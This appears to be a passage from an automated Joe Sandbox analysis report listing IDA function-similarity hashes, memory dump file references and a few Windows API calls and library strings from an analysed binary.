                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 0b9a5c64926b0db1fc015d39bd6f16fda605e1766bc452d13b4a345658113a05
                                                                                                                                                                                      • Instruction ID: 2eb338a55c39ac4dfb785f4431a393b8a1de7d7352da034d9c3508c17406b471
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b9a5c64926b0db1fc015d39bd6f16fda605e1766bc452d13b4a345658113a05
                                                                                                                                                                                      • Instruction Fuzzy Hash: 51D1A072A08A9586EB60DF15F040BA97BA4FB84B88F578136CBCE437A4DB78D485C701
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: cbe9bbfa621d77dea57e6b0165406112bd8e5c6d214bf51f5da938bd5b7aeac0
                                                                                                                                                                                      • Instruction ID: 0529107bdf25dfe9f2062905a9d54d160250af5c21409915f14c966f30b79bab
                                                                                                                                                                                      • Opcode Fuzzy Hash: cbe9bbfa621d77dea57e6b0165406112bd8e5c6d214bf51f5da938bd5b7aeac0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BB12D62E0864245E7698B34B4213783391BF65B88F17423BD9CE466E9DFBEE4C1C742
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 49ee3f194aa1318bb058b058e81100d3136800df28c828006d98068105b5c518
                                                                                                                                                                                      • Instruction ID: 00b7b4860d11aaf8931903984f99941144eef8f33591a2c956043bdd81e6f2eb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 49ee3f194aa1318bb058b058e81100d3136800df28c828006d98068105b5c518
                                                                                                                                                                                      • Instruction Fuzzy Hash: 26B16232B0DB428AEB10CFA1E0503BD67A5BB05788F564536DE8E5BB98DFB8E455C301
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 26be01c31dece2e76e8289bed4ff1a3d0ee02cf873fb57659bf9097e4f8425c4
                                                                                                                                                                                      • Instruction ID: a30bd1cda8de647811f059fb4dcbd39c7fa28ddefcc9805cb48db59df98567e5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 26be01c31dece2e76e8289bed4ff1a3d0ee02cf873fb57659bf9097e4f8425c4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 26B16072A08B4681EB50CF25F444BAA73A4FB88B84F474436DA8D47365EFBCE981C741
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 236b175780d7f46bd25b512d32050df8cf8b6fd8cc245099ec62e5302b5945cc
                                                                                                                                                                                      • Instruction ID: af451b89793d9622625a64b9ae491a5529268e4fc42b5e845f09e2362fffc820
                                                                                                                                                                                      • Opcode Fuzzy Hash: 236b175780d7f46bd25b512d32050df8cf8b6fd8cc245099ec62e5302b5945cc
                                                                                                                                                                                      • Instruction Fuzzy Hash: CCB1BD32A0878286EB649B11E95477A73E1FB49790F034136DACD43BA5DFB9E8D0D702
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      • Instruction Fuzzy Hash: FC81E6B3A056819ADB11CF25E45066DBBA0FB48B80F4BC532DB8E47790EF78D895DB01
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 6569a928983bfe19003c39f7ff2eb48886ed0f2940868716b29ec894a7c8a1ff
                                                                                                                                                                                      • Instruction ID: d7a8668b96bb74d9d631983adb9fad391faf7e6980c2ab446b04918dd95d5ac4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6569a928983bfe19003c39f7ff2eb48886ed0f2940868716b29ec894a7c8a1ff
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8961E372A1866286D7208F15E04077A77A0F7DEB84F175132EA8E17768DEBDE941CF01
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 16ceb259e3493bf1ec588c8a0c623d746afe974d10b1d82e5808d70a243b2649
                                                                                                                                                                                      • Instruction ID: b56f1a729f001ef6a0cefc020d6cd45ed15d4548ca4fd40949d614be65517040
                                                                                                                                                                                      • Opcode Fuzzy Hash: 16ceb259e3493bf1ec588c8a0c623d746afe974d10b1d82e5808d70a243b2649
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5251091361D3C98AEB50CB5D944036C7AE0E766F84F5E8136EAC8833A2DA7DD956C313
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 570795689-0
                                                                                                                                                                                      • Opcode ID: aeb96a2494a04752b5dc3f15f4d6223bcbf2d088cd50240a63637ce0e1d52570
                                                                                                                                                                                      • Instruction ID: c9e3c3501320aa46e807f9d3acf4670ed9611dfda85f1b27178af2b375408d44
                                                                                                                                                                                      • Opcode Fuzzy Hash: aeb96a2494a04752b5dc3f15f4d6223bcbf2d088cd50240a63637ce0e1d52570
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D410D10E0CA4241F9686F317A6137962815FCD7A0F174735E9FE1A6F6FEEDA8098243
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: new[]
                                                                                                                                                                                      • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                      • API String ID: 4059295235-3840279414
                                                                                                                                                                                      • Opcode ID: bb63b660b28564e2b4f56d70e8d4805a2ad26e5cdeba8f4d134ad6f1fd5ea73c
                                                                                                                                                                                      • Instruction ID: 0601aca25de15f9db2f26321e5d3dcad0b115b2e25ccf84d8325cc6d53536cf3
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb63b660b28564e2b4f56d70e8d4805a2ad26e5cdeba8f4d134ad6f1fd5ea73c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 79519451E0C78781FB159F62B411B7A6691AF88B84F474436D9CD0B6B5CEFCE8858303
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                      • Opcode ID: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                                                                                                                                                                                      • Instruction ID: d843e1f9f5cd4f09e10712d54ce8b0fcefe2034bcba481c1b0ed2011cefdc90a
                                                                                                                                                                                      • Opcode Fuzzy Hash: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                                                                                                                                                                                      • Instruction Fuzzy Hash: 481142A2E1CE0702F65C1968FF4637911446FDD370E1B0635E6EF866FAAEEC68494107
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FFEEE259A4F,?,?,00000000,00007FFEEE259CEA,?,?,?,?,00000000,00007FFEEE259C76), ref: 00007FFEEE25B6A3
                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFEEE259A4F,?,?,00000000,00007FFEEE259CEA,?,?,?,?,00000000,00007FFEEE259C76), ref: 00007FFEEE25B6C2
                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFEEE259A4F,?,?,00000000,00007FFEEE259CEA,?,?,?,?,00000000,00007FFEEE259C76), ref: 00007FFEEE25B6EA
                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFEEE259A4F,?,?,00000000,00007FFEEE259CEA,?,?,?,?,00000000,00007FFEEE259C76), ref: 00007FFEEE25B6FB
                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFEEE259A4F,?,?,00000000,00007FFEEE259CEA,?,?,?,?,00000000,00007FFEEE259C76), ref: 00007FFEEE25B70C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RaiseException.KERNEL32(?,?,?,00000004,?,?,?,00007FFEEE21F51E), ref: 00007FFEEE2378FA
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                      • API String ID: 3997070919-4001610065